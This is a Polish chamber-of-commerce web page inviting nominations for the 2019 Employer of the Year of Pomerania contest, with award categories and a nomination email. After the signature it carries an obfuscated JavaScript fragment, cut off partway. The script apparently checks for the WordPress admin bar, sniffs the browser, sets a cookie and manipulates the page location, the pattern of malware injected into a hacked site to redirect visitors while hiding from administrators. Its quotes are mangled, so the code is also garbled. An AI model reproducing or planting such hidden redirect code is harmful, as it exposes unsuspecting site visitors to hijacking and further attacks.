Nominacje do Konkursu Pracodawca Roku Pomorza 2019 | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo, Drodzy Przedsiębiorcy!

Zachęcamy do nominacji przedsiębiorstw w III edycji Konkursu Pracodawca Roku Pomorza 2019. Wspólnie możemy wyróżnić firmy z którymi Państwo współpracujecie i chcielibyście je wyróżnić za swoje działania. Nikt tak dobrze nie zna trudów działalności jak sami Przedsiębiorcy, tym samym warto pokazać swoje dokonania względem pracowników, społeczności lokalnej oraz ochrony środowiska.

Korzyści są bardzo konkretne. Zostanie przeprowadzona kampania promocyjna w mediach, reklama na nośnikach billboardowych w regionie oraz w Telewizji GAWEX gdzie zaprezentujemy zwycięzców. Sylwetki nagrodzonych przedsiębiorców będą też prezentowane w lokalnych mediach. Otrzymanie prestiżowego tytułu „Pracodawcy Roku Pomorza”, to atut w kontaktach z kontrahentami, a przede wszystkim z osobami poszukującymi pracy. Młodzi ludzie mogą być pewni, że warto starać się o pracę w firmie, która zdobyła tytuł „Pracodawcy Roku Pomorza”.

Firmy można nominować w poniższych kategoriach:

  • I kategoria – mikroprzedsiębiorstwa (do 10 osób)
  • II kategoria – przedsiębiorstwa małe (do 50 osób)
  • III kategoria – przedsiębiorstwa średnie (do 250 osób)
  • IV kategoria – przedsiębiorstwa duże (powyżej 250 osób)
  • V kategoria – społeczna odpowiedzialność biznesu – firma aktywna lokalnie oraz wykazująca dbałość o środowisko w którym działa.

Zgłoszenia firm, które Państwo chcą wyróżnić, prosimy wysyłać mailem na adres koszalin@izba.info W treści maila prosimy o podanie nazwy firmy oraz telefonu kontaktowego do przedstawiciela nominowanej firmy.

                                                                  Z poważaniem
Roman Biłas

                                                                Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m